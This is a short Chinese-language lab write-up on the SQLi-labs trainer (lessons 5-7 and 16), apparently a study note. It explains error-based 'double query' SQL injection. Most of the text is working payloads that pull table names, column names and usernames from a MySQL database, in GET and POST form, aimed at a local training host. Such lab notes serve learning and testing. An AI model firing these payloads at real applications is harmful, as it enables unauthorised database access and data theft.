Sql Inject Less 5-7 - 双查询注入

实验

注入地址：

http://192.168.230.130/trainer/Less-5/?id=1' and (select 1 from (select count(*),CONCAT(0x3a,0x3a,(select username from security.users limit 0,1),0x3a,0x3a, floor(rand()*2)) as a from information_schema.columns GROUP BY a)b) --+

这种类型的注入问了很多人，最后得到了【双查询注入】。我一直以为是 【double 查询注入】，果然一定要严谨，严谨，再严谨。只有这样才能建立良好的思维导图。

payload：1' and  (select 1 from (select count(*),CONCAT(0x3a,0x3a,(select table_name from information_schema.TABLES where TABLE_SCHEMA='security' limit 0,1),0x3a,0x3a, floor(rand()*2)) as a from information_schema.columns GROUP BY a)b)     --+

出现的结果会是下图地两种情况，随机刷新出结果来：

查询表字段信息：

payload：1' and  (select 1 from (select count(*),CONCAT(0x3a,0x3a,(select column_name from information_schema.columns where TABLE_NAME='emails' limit 0,1),0x3a,0x3a, floor(rand()*2)) as a from information_schema.columns GROUP BY a)b)     --+

查询数据信息：(select 1 from (select count(*),CONCAT(0x3a,0x3a,(select username from security.users limit 3,1),0x3a,0x3a, floor(rand()*2)) as a from information_schema.tables GROUP BY a)b)

测试地址：http://192.168.230.129/trainer/Less-16/index.php

POST注入、基于错误 

POST注入其实和GET是一样的

payload：1") or (select 1 from (select count(*),CONCAT(0x3a,0x3a,(select username from security.users limit 1,1),0x3a,0x3a, floor(rand()*2)) as a from information_schema.columns GROUP BY a)b) or 1=("1 

之所以加 0x3a我想是为了用 python 写脚本跑程序的时候，容易取得数据。